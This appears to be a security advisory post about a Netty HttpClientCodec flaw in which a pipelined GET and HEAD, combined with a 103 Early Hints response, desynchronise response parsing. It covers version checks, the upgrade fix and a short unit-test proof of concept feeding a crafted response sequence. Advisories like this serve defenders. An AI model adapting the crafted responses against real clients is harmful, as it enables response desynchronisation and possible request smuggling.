Listen to this Post
The vulnerability resides in Netty’s HttpClientCodec, which uses a `queue.poll()` mechanism to pair each inbound HTTP response with its corresponding outbound request. This pairing occurs for every response, including provisional `1xx` (Informational) status codes. The flaw is triggered when an HTTP/1.1 client pipelines a `GET` request immediately followed by a `HEAD` request. If the server sends a `103 Early Hints` response, followed by a `200 OK` containing a body for the `GET` request, and then a second `200 OK` for the `HEAD` request, the codec incorrectly pairs the `HEAD` request with the first `200 OK` response. Because the `HEAD` method is defined to have no response body, the codec then skips reading the payload of the first 200 OK. As a result, the body bytes from the `GET` request remain unconsumed in the TCP stream. The logic later attempts to parse the following `200 OK` for the `HEAD` request, but because the stream’s read pointer is now misaligned due to the leftover bytes, it parses the response from the wrong offset. This leads to a desynchronization of the request-response channel state, causing the codec to fail to correctly decode subsequent HTTP messages on the same connection, disrupting the integrity and availability of the HTTP parsing process.
DailyCVE form:
Platform: Netty
Version: 4.1.132.Final
Vulnerability : Response body misparsing
Severity: Medium
date: 2026-05-07
Prediction: Patch already available
Analytics under heading What Undercode Say:
Check Netty version in your project (Maven) mvn dependency:tree | grep netty-codec-http Check Netty version in your project (Gradle) gradle dependencies | grep netty-codec-http Command to find netty-codec-http jar files find . -name "netty-codec-http.jar" Verify fix by checking for version >=4.1.133.Final or >=4.2.13.Final
How Exploit:
@Test
public void testPipelinedGetHeadAttack() {
EmbeddedChannel channel = new EmbeddedChannel(new HttpClientCodec());
// Pipeline GET then HEAD
channel.writeOutbound(new DefaultFullHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.GET, "/1"));
channel.writeOutbound(new DefaultFullHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.HEAD, "/2"));
// Send maliciously crafted response sequence: 103, 200 with body, 200
String responseStr = "HTTP/1.1 103 Early Hints\r\n\r\n" +
"HTTP/1.1 200 OK\r\nContent-Length: 5\r\n\r\nhello" +
"HTTP/1.1 200 OK\r\n\r\n";
channel.writeInbound(Unpooled.copiedBuffer(responseStr, CharsetUtil.US_ASCII));
// Subsequent responses are parsed incorrectly, leading to failure
}
Protection from this CVE:
Upgrade `io.netty:netty-codec-http` to version `4.1.133.Final` (stable) or `4.2.13.Final` (next stable). This update corrects the response-request pairing logic to handle pipelined `HEAD` and `GET` requests with `1xx` responses properly.
Impact:
Integrity and availability of HTTP parsing on the affected connection, leading to unsafe reuse of the socket and potential request smuggling scenarios.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
